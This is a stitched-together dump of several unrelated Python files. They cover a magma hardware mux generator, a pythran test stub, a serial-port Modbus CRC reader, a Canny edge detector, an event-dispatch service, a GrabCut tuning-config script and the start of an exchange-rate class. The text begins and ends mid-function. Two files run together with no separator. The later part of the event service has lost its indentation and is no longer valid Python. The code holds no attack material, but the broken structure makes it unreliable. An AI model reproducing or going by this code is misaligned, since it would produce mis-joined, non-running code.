    """Pass through an already-decoded payload dict; decode anything else."""
    if type(token_or_payload) is dict:
        return token_or_payload
    return decode(token_or_payload)
|
import hwtypes as ht
from hwtypes import BitVector, UIntVector, SIntVector
from magma.array import Array
from magma.bit import Bit
from magma.bits import Bits, UInt, SInt
from magma.bitutils import clog2, seq2int
from magma.circuit import coreir_port_mapping
from magma.generator import Generator2
from magma.interface import IO
from magma.protocol_type import MagmaProtocol, magma_type
from magma.t import Type, In, Out, Direction
from magma.tuple import Product, Tuple
from magma.type_utils import type_to_sanitized_string
from magma.conversions import tuple_
class CoreIRCommonLibMuxN(Generator2):
    """Generator wrapping coreir commonlib's ``muxn``: an N-way mux of
    width-bit words, plus a pure-Python simulation model."""
    def __init__(self, N: int, width: int):
        self.name = f"coreir_commonlib_mux{N}x{width}"
        FlatT = Array[width, Bit]
        # Input bundle: N flattened data words and a clog2(N)-bit select.
        MuxInT = Product.from_fields("anon", dict(data=Array[N, FlatT],
                                                  sel=Array[clog2(N), Bit]))
        self.io = IO(I=In(MuxInT), O=Out(Array[width, Bit]))
        self.renamed_ports = coreir_port_mapping
        self.coreir_name = "muxn"
        self.coreir_lib = "commonlib"
        self.coreir_genargs = {"width": width, "N": N}
        self.primitive = True
        self.stateful = False
        def simulate(self, value_store, state_store):
            # Combinational model: forward the word picked by the select.
            sel = BitVector[clog2(N)](value_store.get_value(self.I.sel))
            out = BitVector[width](value_store.get_value(self.I.data[int(sel)]))
            value_store.set_value(self.O, out)
        self.simulate = simulate
class Mux(Generator2):
    """Generic ``height``-way mux over any magma type T, implemented by
    flattening each input to bits and delegating to CoreIRCommonLibMuxN."""
    def __init__(self, height: int, T: Type):
        # Normalize hwtypes values to their magma equivalents.
        if issubclass(T, BitVector):
            T = Bits[len(T)]
        if issubclass(T, (bool, ht.Bit)):
            T = Bit
        # TODO(rsetaluri): Type should be hashable so the generator instance can
        # be cached.
        T_str = type_to_sanitized_string(T)
        self.name = f"Mux{height}x{T_str}"
        N = magma_type(T).flat_length()
        ports = {f"I{i}": In(T) for i in range(height)}
        # A 2-way mux takes a single select Bit; otherwise clog2(height) bits.
        T_S = Bit if height == 2 else Array[clog2(height), Bit]
        ports["S"] = In(T_S)
        ports["O"] = Out(T)
        self.io = io = IO(**ports)
        mux = CoreIRCommonLibMuxN(height, N)()
        # Flatten each input into a width-N bit array for the inner muxn.
        data = [Array[N, Bit](getattr(io, f"I{i}").flatten())
                for i in range(height)]
        mux.I.data @= Array[height, Array[N, Bit]](data)
        if height == 2:
            mux.I.sel[0] @= io.S
        else:
            mux.I.sel @= io.S
        out_ts = mux.O.ts
        # Rebuild a value of type T from the flat output bits.
        if issubclass(T, MagmaProtocol):
            out = Out(T)._from_magma_value_(T._to_magma_().unflatten(out_ts))
        else:
            out = T.unflatten(out_ts)
        io.O @= out
def _infer_mux_type(args):
    """
    Try to infer type by traversing arguments in order:
    * If we encounter a magma Type/Protocol, use that
    * BitVector/Bit/bool are converted to their magma equivalent Bits/Bit
    * Python tuple is converted to m.Tuple (note this will invoke m.tuple_ on
      all the arguments, which may raise an error if the tuple arguments are
      not well formed)

    Note that we do not infer from standard python int arguments because we
    cannot, in general, determine the correct bit width (use BitVector instead)

    Returns the inferred type and the (possibly converted) argument list.
    """
    T = None
    for arg in args:
        if isinstance(arg, (Type, MagmaProtocol)):
            next_T = type(arg).qualify(Direction.Undirected)
        elif isinstance(arg, UIntVector):
            next_T = UInt[len(arg)]
        elif isinstance(arg, SIntVector):
            next_T = SInt[len(arg)]
        elif isinstance(arg, BitVector):
            next_T = Bits[len(arg)]
        elif isinstance(arg, (ht.Bit, bool)):
            next_T = Bit
        elif isinstance(arg, tuple):
            next_T = type(tuple_(arg))
        elif isinstance(arg, int):
            # Cannot infer type without width, use wiring implicit coercion to
            # handle (or raise type error there)
            continue
        # NOTE(review): an argument matching none of the branches above
        # (e.g. a float) leaves next_T unbound on the first iteration or
        # stale on later ones — confirm callers never pass such values.
        if T is not None:
            if issubclass(T, next_T):
                # upcast
                T = next_T
            elif not next_T.is_wireable(T) and not T.is_wireable(next_T):
                raise TypeError(
                    f"Found incompatible types {next_T} and {T} in mux"
                    " inference"
                )
        else:
            T = next_T
    if T is None:
        raise TypeError(
            f"Could not infer mux type from {args}\n"
            "Need at least one magma value, BitVector, bool or tuple")
    if issubclass(T, Tuple):
        # Convert every python tuple argument into a magma tuple value.
        args = [tuple_(a) for a in args]
    return T, args
# Public alias of the inference helper.
infer_mux_type = _infer_mux_type
def mux(I: list, S, **kwargs):
    """
    How type inference works on I:
        This operator will traverse the list of inputs I and use the first
        magma value to determine the type.  This allows I to contain coerceable
        objects like ints (e.g. `mux([1, x], s)` where `x: UInt[2]`).  Coercion
        is peformed when wiring the arguments to the input of an instance of
        Mux(T) (where T is the type of the first magma value) and will raise an
        error there if one of the values cannot be coerced to T.

        **NOTE** This will fail if the type of the first magma value cannot
        coerce subsequent arguments (even though the type of a later argument
        might be able to coerce the type of the earliest argument).  We plan to
        improve the algorithm to support the more general cases, but until
        then, if you run into this problem, use `Mux(T)` where `T` can coerce
        all arguments.
    """
    # A constant magma select collapses to a plain python index below.
    if isinstance(S, Type) and S.const():
        S = seq2int(S.bits())
    if isinstance(S, int):
        # Static select: no hardware needed, just pick the argument.
        return I[S]
    T, I = _infer_mux_type(I)
    inst = Mux(len(I), T)(**kwargs)
    # A 2-way Mux takes a single Bit select; unwrap a Bits[1] value.
    if len(I) == 2 and isinstance(S, Bits[1]):
        S = S[0]
    result = inst(*I, S)
    # Verify every input actually got wired; unwired ports mean an argument
    # could not be coerced to the inferred type T.
    for i in range(len(I)):
        if getattr(inst, f"I{i}").value() is None:
            arg = I[i]
            raise TypeError(f"mux arg I[{i}] ({arg}: {type(arg)}) does not "
                            f"match inferred input port type {T}")
    return result
# Monkey patch for ite impl without circular dependency
Bit._mux = staticmethod(mux)
# NOTE(rsetaluri): We monkeypatch this function on to Array due to the circular
# dependency between Mux and Array. See the discussion on
# https://github.com/phanrahan/magma/pull/658.
def _dynamic_mux_select(this, key):
    """Index an Array with a dynamic (non-constant) magma value via a mux."""
    return mux(this.ts, key)
Array.dynamic_mux_select = _dynamic_mux_select
def dict_lookup(dict_, select, default=0):
    """
    Use `select` as an index into `dict` (similar to a case statement).

    `default` is returned when `select` matches none of the keys; it
    defaults to 0.
    """
    result = default
    # Chain a 2-way mux per entry; the matching key wins.
    for candidate_key, candidate_value in dict_.items():
        result = mux([result, candidate_value], candidate_key == select)
    return result
def list_lookup(list_, select, default=0):
    """
    Use `select` as an index into `list` (similar to a case statement).

    `default` is returned when `select` matches none of the indices (e.g.
    when the select width exceeds the list length); it defaults to 0.
    """
    result = default
    # Chain a 2-way mux per element; the matching index wins.
    for index, element in enumerate(list_):
        result = mux([result, element], index == select)
    return result
|
""" Tests for test cases directory. """
# TODO: check http://code.google.com/p/unladen-swallow/wiki/Benchmarks
import os
import unittest
from pythran.tests import TestFromDir
class TestCases(TestFromDir):
    """ Class to check all tests in the cases directory. """
    # Directory of source files; each one becomes an individual test method.
    path = os.path.join(os.path.dirname(__file__), "cases")
# Generate the per-case test methods onto the class itself.
TestCases.populate(TestCases)
if __name__ == '__main__':
    unittest.main()
|
import serial
import time
serial_com = 'com8'
serial_bps = 9600
class MySerial(object):
    """Thin wrapper around ``serial.Serial`` with Modbus-style CRC16 support."""
    def __init__(self, com, bps):
        # Open the port: even parity, 1 stop bit, 8 data bits; ``com`` is the
        # port name and ``bps`` the baud rate (9600 for this device).
        self.ser = serial.Serial(com, int(bps), parity="E", stopbits=1, bytesize=8)
    def read(self):
        """Drain everything currently buffered on the port and return it.

        Bug fix: the original overwrote ``data`` on every loop pass (keeping
        only the last chunk) and raised NameError when nothing was waiting;
        start from an empty buffer and accumulate the chunks instead.
        """
        print("读取数据:", end=" ")
        data = b""
        while self.ser.inWaiting():
            data += self.ser.read(self.ser.inWaiting())
        print(data)
        print("读取完成")
        return data
    def write(self, data):
        """Send *data* (a bytes-like object) out the port; returns True."""
        self.ser.write(data)
        return True
    def crc16(self, x):
        """Append the Modbus CRC-16 (poly 0xA001, init 0xFFFF) to *x*.

        *x* is a list of byte values; returns ``x + [crc_low, crc_high]``
        (Modbus transmits the low CRC byte first).
        """
        a = 0xFFFF
        b = 0xA001
        for byte in x:
            a ^= byte
            for i in range(8):
                last = a % 2
                a >>= 1
                if last == 1:
                    a ^= b
        return x + [a & 0xFF, a >> 8]
    def close(self):
        """Release the serial port."""
        self.ser.close()
m_serial = MySerial(serial_com, serial_bps)  # open the serial connection at import time
if __name__ == '__main__':
    w = [0X42,0X4D,0XE3,0X00,0X00,0X01,0X72]  # data-request command understood by the hardware
    myserial = MySerial("com8",9600)
    while True:
        # Poll: send the request, wait for the device, then read the reply.
        myserial.write(bytes(w))
        time.sleep(0.3)
        data = myserial.read().hex()
        # Split the hex dump into two-character byte strings.
        s = [data[i:i+2] for i in range(0, len(data), 2)]
        # NOTE(review): combines reply bytes 2 and 8 into one reading —
        # presumably per the device's frame layout; confirm against its spec.
        res = int(s[2], 16)*256+int(s[8], 16)
        print(res)
        time.sleep(4)
        # res = s[8]*255+s[9]*8+s[10]
        # print(f"浓度:{res}")
#!/usr/bin/env python
import math
import time
import numpy
import random
from scipy import ndimage
#from appionlib.apImage import imagefile
"""
adapted from:
http://code.google.com/p/python-for-matlab-users/source/browse/Examples/scipy_canny.py
"""
#=======================
#=======================
def getRadialAndAngles(shape):
    """Build two pixel grids for an image of the given shape: the squared
    distance from the image center (offset by -0.5) and the polar angle of
    each pixel, both centered on half-pixel coordinates."""
    half_x = shape[0] / 2.0
    half_y = shape[1] / 2.0
    xcoords = numpy.arange(-half_x, half_x, 1) + 0.5
    ycoords = numpy.arange(-half_y, half_y, 1) + 0.5
    gridx, gridy = numpy.meshgrid(xcoords, ycoords)
    radialsq = gridx ** 2 + gridy ** 2 - 0.5
    angles = numpy.arctan2(gridy, gridx)
    return radialsq, angles
#=======================
#=======================
def non_maximal_edge_suppresion(mag, orient, minEdgeRadius=20, maxEdgeRadius=None):
    """
    Non Maximal suppression of gradient magnitude and orientation.

    Keeps only pixels that are local maxima of ``mag`` across their binned
    gradient direction, restricted to an annulus between minEdgeRadius and
    maxEdgeRadius around the image center.  Returns a boolean edge map.
    """
    ## bin orientations into 4 discrete directions
    abin = ((orient + math.pi) * 4 / math.pi + 0.5).astype('int') % 4
    radialsq, angles = getRadialAndAngles(mag.shape)
    ### create circular mask
    if maxEdgeRadius is None:
        # Bug fix: use floor division — ``/`` yields floats under Python 3
        # and floats cannot be used as array indices.
        maxEdgeRadiusSq = radialsq[mag.shape[0] // 2, mag.shape[0] // 10]
    else:
        maxEdgeRadiusSq = maxEdgeRadius**2
    outermask = numpy.where(radialsq > maxEdgeRadiusSq, False, True)
    ## probably a bad idea here
    innermask = numpy.where(radialsq < minEdgeRadius**2, False, True)
    ### create directional filters to go with offsets
    horz = numpy.where(numpy.abs(angles) < 3*math.pi/4., numpy.abs(angles), 0)
    horz = numpy.where(horz > math.pi/4., True, False)
    # Bug fix: unary ``-`` on boolean arrays was removed from numpy;
    # logical_not preserves the original elementwise-negation intent.
    vert = numpy.logical_not(horz)
    upright = numpy.where(angles < math.pi/2, False, True)
    upleft = numpy.flipud(upright)
    upleft = numpy.fliplr(upleft)
    upright = numpy.logical_or(upright, upleft)
    upleft = numpy.logical_not(upright)
    # for rotational edges
    filters = [horz, upleft, vert, upright]
    # for radial edges
    #filters = [vert, upright, horz, upleft]
    offsets = ((1, 0), (1, 1), (0, 1), (-1, 1))
    edge_map = numpy.zeros(mag.shape, dtype='bool')
    for a in range(4):
        di, dj = offsets[a]
        # Footprint selects the two neighbors along this direction only.
        footprint = numpy.zeros((3, 3), dtype="int")
        footprint[1, 1] = 0
        footprint[1+di, 1+dj] = 1
        footprint[1-di, 1-dj] = 1
        ## get adjacent maximums
        maxfilt = ndimage.maximum_filter(mag, footprint=footprint)
        ## select points larger than adjacent maximums
        newedge_map = numpy.where(mag > maxfilt, True, False)
        ## filter by edge orientation
        newedge_map = numpy.where(abin == a, newedge_map, False)
        ## filter by location
        newedge_map = numpy.where(filters[a], newedge_map, False)
        ## add to main map
        edge_map = numpy.where(newedge_map, True, edge_map)
    ## remove corner edges
    edge_map = numpy.where(outermask, edge_map, False)
    edge_map = numpy.where(innermask, edge_map, False)
    return edge_map
#=======================
#=======================
def canny_edges(image, minedges=5000, maxedges=15000, low_thresh=50, minEdgeRadius=20, maxEdgeRadius=None):
    """
    Compute Canny edge detection on an image.

    Iteratively adjusts the high hysteresis threshold (randomized search)
    until the edge count falls between ``minedges`` and ``maxedges``.
    Returns a boolean edge map.
    """
    dx = ndimage.sobel(image, 0)
    dy = ndimage.sobel(image, 1)
    mag = numpy.hypot(dx, dy)
    mag = mag / mag.max()
    ort = numpy.arctan2(dy, dx)
    edge_map = non_maximal_edge_suppresion(mag, ort, minEdgeRadius, maxEdgeRadius)
    edge_map = numpy.logical_and(edge_map, mag > low_thresh)
    # Fix: the ndimage.measurements namespace is deprecated/removed in recent
    # scipy; ndimage.label/ndimage.maximum are the long-standing equivalents.
    labels, numlabels = ndimage.label(edge_map, numpy.ones((3, 3)))
    maxs = ndimage.maximum(mag, labels, range(1, numlabels + 1))
    maxs = numpy.array(maxs, dtype=numpy.float64)
    high_thresh = maxs.mean()
    minThresh = maxs.min()
    edge_count = edge_map.sum()
    count = 0
    while count < 25:
        t0 = time.time()
        count += 1
        maxs = ndimage.maximum(mag, labels, range(1, numlabels + 1))
        maxs = numpy.array(maxs, dtype=numpy.float64)
        # good_label[i] is True when labeled region i survives the threshold;
        # index 0 (background) is always False.
        good_label = (maxs > high_thresh)
        good_label = numpy.append([False, ], good_label)
        numgood = good_label.sum()
        if numgood == numlabels and high_thresh > minThresh:
            # Diagnostic dump for an inconsistent threshold state.
            # Bug fix: the original Python 2 print statements are syntax
            # errors under Python 3; use the print() function.
            print("ERROR")
            maxs.sort()
            print(high_thresh)
            print(maxs[:3], maxs[-3:])
            print(maxs[0], ">", high_thresh, "=", maxs[0] > high_thresh)
            # Bug fix: numpy.bool was removed (numpy 1.24); bool is equivalent.
            good_label = numpy.zeros((numlabels + 1,), dtype=bool)
            good_label[1:] = maxs > high_thresh
            print(good_label[:3], good_label[-3:])
            time.sleep(10)
        # Map each pixel's label through the keep/drop table.
        newedge_map = good_label[labels]
        edge_count = newedge_map.sum()
        print("canny edges=%d, (thresh=%.3f) time=%.6f" % (edge_count, high_thresh, time.time() - t0))
        if edge_count > maxedges:
            # Too many edges: raise the threshold by a random factor.
            rand = math.sqrt(random.random())
            new_thresh = high_thresh / rand
            # fix for too large values
            if new_thresh < 1.0:
                high_thresh = new_thresh
            else:
                high_thresh = math.sqrt(high_thresh)
        elif edge_count < minedges and high_thresh > minThresh:
            # Too few edges: lower the threshold by a random factor.
            rand = math.sqrt(random.random())
            new_thresh = high_thresh * rand
            high_thresh = new_thresh
        else:
            break
    return newedge_map
#=======================
#=======================
#=======================
#=======================
if __name__ == "__main__":
    # NOTE(review): scipy.misc.lena was removed from scipy long ago — on a
    # modern scipy this demo needs scipy.datasets.ascent or a local image.
    from scipy.misc import lena
    from matplotlib import pyplot
    lena = lena()
    # Smooth heavily so only strong large-scale edges remain.
    image = ndimage.filters.gaussian_filter(lena, 6)
    edgeimage = canny_edges(image, minedges=2500, maxedges=15000, low_thresh=0.001, minEdgeRadius=20, maxEdgeRadius=None)
    pyplot.imshow(edgeimage)
    pyplot.gray()
    pyplot.show()
|
# -*- coding: utf-8 -*-
"""
@Time: 2021/7/14 16:32
@Author: zzhang zzhang@cenboomh.com
@File: ModelUpdate.py
@desc:
"""
import json
from collect.collect_service import CollectService
from collect.utils.collect_utils import get_safe_data
class EventService(CollectService):
    """Collect service that drives event templates: loads the template's
    data_json configuration and exposes accessors for the template's
    well-known configuration keys (only part of the class is shown here)."""
    # Class-wide cache of parsed data_json files, keyed by path and shared
    # across all instances.
    data_json_dict = {}
    # Names of the keys this service reads from an event template.
    ESConst = {
        "data_json_name": "data_json",
        "from_name": "from",
        "before_params_append_name": "before_params_append",
        "to_name": "to",
        "bulk_service_name": "bulk_service",
        "bulk_result_field_name": "bulk_result_field",
        "finish_service_name": "finish_service",
        "log_create_name": "log_create",
        "log_update_name": "log_update",
        "log_save_service_name": "log_save_service",
        "log_update_service_name": "log_update_service"
    }
    def __init__(self, op_user):
        CollectService.__init__(self, op_user)
        # Current event template and downstream services; set via setters.
        self.event_template = None
        self.to_services = None
        # Accumulated log entries for created/updated records.
        self.create_log_list = []
        self.update_log_list = []
    # --- accessors for the ESConst key names ---
    def get_log_create_name(self):
        return self.ESConst["log_create_name"]
    def get_log_save_service_name(self):
        return self.ESConst["log_save_service_name"]
    def get_log_update_service_name(self):
        return self.ESConst["log_update_service_name"]
    def get_log_update_name(self):
        return self.ESConst["log_update_name"]
    def get_finish_service_name(self):
        return self.ESConst["finish_service_name"]
    def get_bulk_result_field_name(self):
        return self.ESConst["bulk_result_field_name"]
    def set_to_services(self, to_services):
        self.to_services = to_services
    def get_to_services(self):
        return self.to_services
    def get_bulk_service_name(self):
        return self.ESConst["bulk_service_name"]
    def get_before_params_append_name(self):
        return self.ESConst["before_params_append_name"]
    def get_from_name(self):
        return self.ESConst["from_name"]
    def get_event_template(self):
        return self.event_template
    def set_event_template(self, event_template):
        self.event_template = event_template
    def get_data_json_name(self):
        return self.ESConst["data_json_name"]
    def get_to_name(self):
        return self.ESConst["to_name"]
    @staticmethod
    def get_json_content(path):
        # Cached data_json content for *path*, or None when not loaded yet.
        return get_safe_data(path, EventService.data_json_dict)
    @staticmethod
    def set_json_content(path, data_json_content):
        # Store parsed content in the class-wide cache.
        EventService.data_json_dict[path] = data_json_content
    def get_data_json_config_path(self):
        """Absolute path of the template's data_json file under the config dir."""
        data_json = get_safe_data(self.get_data_json_name(), self.template)
        config_dir = self.get_config_dir()
        config_file = config_dir + "/" + data_json
        return config_file
def get_data_json(self, params):
config_file_path = self.get_data_json_config_path()
json_content = self.get_json_content(config_file_path)
if json_content:
return self.success(json_content)
data_json = get_safe_data(self.get_data_json_name(), self.template)
data_json_result = self.get_config_file(data_json, params)
if self.is_success(data_json_result):
data_json_content = self.get_data(data_json_result)
self.set_json_content(config_file_path, data_json_content)
return data_json_result
def get_event_param(self, data_json_templ):
from collect.service_imp.common.filters.template_tool import TemplateTool
# tool = TemplateTool(op_user=self.op_user)
# data_json = tool.render(data_json_templ, params_result)
try:
import json
data_json = json.loads(data_json_templ)
return self.success(data_json)
except Exception as e:
self.log(data_json_templ, "error")
return self.fail(str(e) + " JSON格式有误,请检查配置")
def event_check(self):
from_services = get_safe_data(self.get_from_name(), self.get_event_template())
if not from_services:
return self.fail("没有配置来源服务")
params_result = self.get_params_result()
from_service = get_safe_data(self.get_from_service_name(), params_result)
if from_service not in from_services:
return self.fail("非法服务,请检查配置")
return self.success([])
def before_event(self):
params_result = self.get_params_result()
event_template = self.get_event_template()
appends = get_safe_data(self.get_before_params_append_name(), event_template)
if appends:
# 添加一些变量
tool = self.get_render_tool()
for item in appends:
field = get_safe_data(self.get_field_name(), item)
temp = get_safe_data(self.get_template_name(), item)
params_result[field] = self.get_render_data(temp, params_result, tool)
to_services = get_safe_data(self.get_to_name(), event_template)
if not to_services:
return self.fail("没有找到目标服务")
tool = self.get_render_tool()
services = []
# 拼接服务
for index, to_service in enumerate(to_services):
service = get_safe_data(self.get_service_name(), to_service)
if not self.is_enable(to_service, params_result):
continue
if not service:
return self.fail(" 第 " + str(index + 1) + "个服务没有配置 " + self.get_service_name())
# 处理外部参数
for field in to_service:
temp = to_service[field]
if self.is_template_text(temp):
to_service[field] = tool.render(temp, params_result)
# 处理service
self.get_node_service(to_service, params_result)
# 添加日志
service_item = get_safe_data(self.get_service_name(), to_service)
self.add_create_log_data(service_item)
services.append(service_item)
if len(services) <= 0:
return self.fail("没有找的事件执行服务")
self.set_to_services(services)
self.create_log_data()
return self.success([])
def get_template_log(self):
log = get_safe_data(self.get_log_name(), self.get_event_template())
import copy
return copy.deepcopy(log)
def can_log_data(self):
"""
判断是否需要记录日志
"""
log = self.get_template_log()
if not log:
return False
else:
return True
def get_service_item_params(self, service_item=None, result=None, create_log_list=None, update_log_list=None):
item = {
"params": self.get_params_result()
}
if service_item:
item["service_item"] = service_item
if result:
item["result"] = result
if update_log_list:
item["update_log_list"] = update_log_list
if create_log_list:
item["create_log_list"] = create_log_list
return item
def get_log_data(self, node_name, service_item=None, result=None, create_log_list=None, update_log_list=None):
template_log = self.get_template_log()
params = self.get_service_item_params(service_item=service_item, result=result, create_log_list=create_log_list,
update_log_list=update_log_list)
log = get_safe_data(node_name, template_log)
service = {self.get_service_name(): log}
create_item = self.get_node_service(service, params, append_param=False)
if not self.is_success(create_item):
self.log(self.get_msg(create_item), level="error")
return False
return self.get_data(create_item)
def add_create_log_data(self, service_item):
"""
添加日志记录
"""
if not self.can_log_data():
return False
create_item = self.get_log_data(node_name=self.get_log_create_name(), service_item=service_item)
if create_item:
self.create_log_list.append(create_item)
def create_log_data(self):
"""
执行日志添加服务
"""
if not self.can_log_data():
return False
create_log_service = self.get_log_data(node_name=self.get_log_save_service_name(),
create_log_list=self.create_log_list)
create_log_service_result = self.get_service_result(create_log_service)
if not self.is_success(create_log_service_result):
self.log(self.get_msg(create_log_service_result), level="error")
def add_update_log_data(self, service_item, result):
"""
添加更新日志
"""
if not self.can_log_data():
return False
update_item = self.get_log_data(node_name=self.get_log_update_name(), service_item=service_item, result=result)
if update_item:
self.update_log_list.append(update_item)
def update_log_data(self):
"""
执行日志更新服务
"""
if not self.can_log_data():
return False
update_log_service = self.get_log_data(node_name=self.get_log_update_service_name(),
update_log_list=self.update_log_list)
update_log_service_result = self.get_service_result(update_log_service)
if not self.is_success(update_log_service_result):
self.log(self.get_msg(update_log_service_result), level="error")
def after_event(self):
event_template = self.get_event_template()
params_result = self.get_params_result()
req = get_safe_data(self.get_finish_service_name(), event_template)
if req:
# 构造结束服务
node = {
self.get_service_name(): req
}
finish = self.get_node_service(node, params_result, append_param=False)
finish = self.get_data(finish)
if self.can_log():
self.log(json.dumps(finish))
# 执行结束服务
finish_result = self.get_service_result(finish)
if self.can_log():
self.log(json.dumps(finish_result))
if not self.is_success(finish_result):
return finish_result
return self.success([])
def execute_event(self):
event_template = self.get_event_template()
params_result = self.get_params_result()
to_services = self.get_to_services()
params_result[self.get_to_name()] = to_services
req = get_safe_data(self.get_bulk_service_name(), event_template)
if not req:
return self.fail("没有配置批量执行的服务")
# 构造批量服务
node = {
self.get_service_name(): req
}
bulk = self.get_node_service(node, params_result, append_param=False)
bulk = self.get_data(bulk)
if self.can_log():
self.log(json.dumps(bulk))
# 批量执行服务
bulk_result = self.get_service_result(bulk)
if self.can_log():
self.log(json.dumps(bulk_result))
bulk_result_field = get_safe_data(self.get_bulk_result_field_name(), event_template)
# 设置批量结果
if not self.is_success(bulk_result):
return bulk_result
res = self.get_data(bulk_result)
if bulk_result_field:
params_result[bulk_result_field] = res
del params_result[self.get_to_name()]
# 设置单个结果
for request, result in zip(get_safe_data(self.get_to_name(), event_template), res):
save_field = get_safe_data(self.get_save_field_name(), request)
params_result[save_field] = result
self.add_update_log_data(get_safe_data(self.get_service_name(), request), result)
# 构造结束服务
self.update_log_data()
return self.success([])
def result(self, params=None):
params_result = self.get_params_result()
data_json_result = self.get_data_json(params_result)
if not self.is_success(data_json_result):
return data_json_result
data_json_templ = self.get_data(data_json_result)
data_json_result = self.get_event_param(data_json_templ)
if not self.is_success(data_json_result):
return data_json_result
event_template = self.get_data(data_json_result)
self.set_event_template(event_template)
# 检查
check_result = self.event_check()
if not self.is_success(check_result):
return check_result
# 执行前
before_result = self.before_event()
if not self.is_success(before_result):
return before_result
# 执行中
execute_result = self.execute_event()
if not self.is_success(execute_result):
return execute_result
# 执行后
after_result = self.after_event()
if not self.is_success(after_result):
return after_result
return self.success(data={}, msg="发送成功")
|
import os
import json
# Input/output locations and parameter lists for the MIP-detection tuning runs.
image_dir = 'data/validation_set'        # validation images to score against
truth = 'data/validation_cardinfo'       # ground-truth card info
out_base = 'data/tune_only_mip_det'      # base directory for per-trial outputs
# Channel splits / image features used by the 'classical' MIP grids
# (referenced by the commented-out generators below).
mip_splits = ['cb', 'cr', 'cbcr', 'sat', 'val']
mip_features = ['fft', 'hog', 'sobel', 'none']
# i = 0
# trials = []
# for mip_split in mip_splits:
# for mip_feature in mip_features:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'classical',
# 'method_details':
# {'mip_channel_split': mip_split,
# 'mip_image_features': mip_feature}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det.json', 'w') as f:
# json.dump(trials, f, indent=2)
# iter_counts = [3, 5]
# scales = [0.1, 0.5]
# k_scales = [0.01, 0.05, 0.10]
# rect_scales = [[0.01, 0.01, 0.01, 0.01],
# [0.02, 0.01, 0.02, 0.01],
# [0.02, 0.02, 0.02, 0.02],
# [0.01, 0.02, 0.01, 0.02],
# [0.05, 0.02, 0.05, 0.02],
# [0.05, 0.05, 0.05, 0.05],
# [0.02, 0.05, 0.02, 0.05],
# [0.05, 0.05, 0.05, 0.05],
# [0.01, 0.05, 0.01, 0.05],
# [0.05, 0.01, 0.05, 0.01]]
#
#
# i = 20
# iter_counts = [5]
# scales = [0.1, 0.25, 0.5]
# k_scales = [0.01, 0.05, 0.10]
# rect_scales = [[0.05, 0.05, 0.01, 0.01],
# [0.05, 0.01, 0.01, 0.05],
# [0.05, 0.03, 0.05, 0.03],
# [0.01, 0.05, 0.05, 0.01]]
#
#
# i = 140
#
# trials = []
# for iter_count in iter_counts:
# for scale in scales:
# for k_scale in k_scales:
# for rect_scale in rect_scales:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'grabcut',
# 'method_details':
# {'gc_type': 'rect',
# 'probable_background': [0.0, 0.0, 0.0, 0.0],
# 'probable_foreground': [0.0, 0.0, 0.0, 0.0],
# 'sure_foreground': [0.0, 0.0, 0.0, 0.0],
# 'iter_count': iter_count,
# 'scale': scale,
# 'k_scale': k_scale,
# 'rect_scale': rect_scale}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det_pt3.json', 'w') as f:
# json.dump(trials, f, indent=2)
# probable_backgrounds = [[0.01, 0.001, 0.01, 0.001],
# [0.001, 0.001, 0.001, 0.001]]
# probable_foregrounds = [[0.05, 0.01, 0.05, 0.01],
# [0.05, 0.03, 0.05, 0.03]]
# sure_foregrounds = [[0.1, 0.05, 0.1, 0.05],
# [0.2, 0.1, 0.2, 0.1]]
#
#
# i = 176
#
# trials = []
# for prob_back in probable_backgrounds:
# for prob_fore in probable_foregrounds:
# for sure_fore in sure_foregrounds:
# out_dir = os.path.join(out_base, str(i).zfill(4))
# trial = {'out_dir': out_dir,
# 'split': 'none',
# 'binary': 'none',
# 'f_size': 1,
# 'input_imgs': image_dir,
# 'truth_data': truth,
# 'mip_method': 'grabcut',
# 'method_details':
# {'gc_type': 'rect',
# 'probable_background': prob_back,
# 'probable_foreground': prob_fore,
# 'sure_foreground': sure_fore,
# 'iter_count': 5,
# 'scale': 0.5,
# 'k_scale': 0.05,
# 'rect_scale': [0.0, 0.0, 0.0, 0.0]}
# }
# trials.append(trial)
# i += 1
#
# with open('data/tune_only_mip_det_pt4.json', 'w') as f:
# json.dump(trials, f, indent=2)
# GrabCut mask-threshold candidates: one measured set and one round-number set.
probable_backgrounds = [[0.0505, 0.0440, 1 - 0.9264, 1 - 0.9702],
                        [0.05, 0.05, 0.05, 0.05]]
probable_foregrounds = [[0.1247, 0.1735, 1 - 0.8624, 1 - 0.8530],
                        [0.2, 0.2, 0.2, 0.2]]
sure_foregrounds = [[0.1781, 0.3087, 1 - 0.7926, 1 - 0.6522],
                    [0.4, 0.4, 0.4, 0.4]]

# Cartesian product of the three candidate lists, in the same order the
# original nested loops produced.
combos = [(pb, pf, sf)
          for pb in probable_backgrounds
          for pf in probable_foregrounds
          for sf in sure_foregrounds]

trials = []
i = 184  # trial ids continue from the previous tuning batch
for pb, pf, sf in combos:
    trials.append({'out_dir': os.path.join(out_base, str(i).zfill(4)),
                   'split': 'none',
                   'binary': 'none',
                   'f_size': 1,
                   'input_imgs': image_dir,
                   'truth_data': truth,
                   'mip_method': 'grabcut',
                   'method_details':
                       {'gc_type': 'mask',
                        'probable_background': pb,
                        'probable_foreground': pf,
                        'sure_foreground': sf,
                        'iter_count': 5,
                        'scale': 0.25,
                        'k_scale': 0.05,
                        'rect_scale': [0.0, 0.0, 0.0, 0.0]}})
    i += 1

with open('data/tune_only_mip_det_pt5.json', 'w') as f:
    json.dump(trials, f, indent=2)
import UserDict
import calendar
import requests
class UsdRates(UserDict.UserDict):
    """Dict-like map of currency symbol -> USD exchange rate, fetched from
    the CryptoCompare API in batches, with optional symbol translation and
    backup values for symbols the API did not return.
    """

    def __init__(self, currencies, backup_rates=None, translations=None):
        """Fetch current rates for `currencies`.

        backup_rates: fallback {symbol: rate} used for symbols missing from
                      the API response.
        translations: {our_symbol: api_symbol} applied when querying and
                      reversed on the results.
        """
        UserDict.UserDict.__init__(self)
        # BUG FIX: the defaults were mutable dict literals ({}), which are
        # shared across calls; use None sentinels instead.
        if backup_rates is None:
            backup_rates = {}
        if translations is None:
            translations = {}
        translations_r = {v: k for k, v in translations.iteritems()}
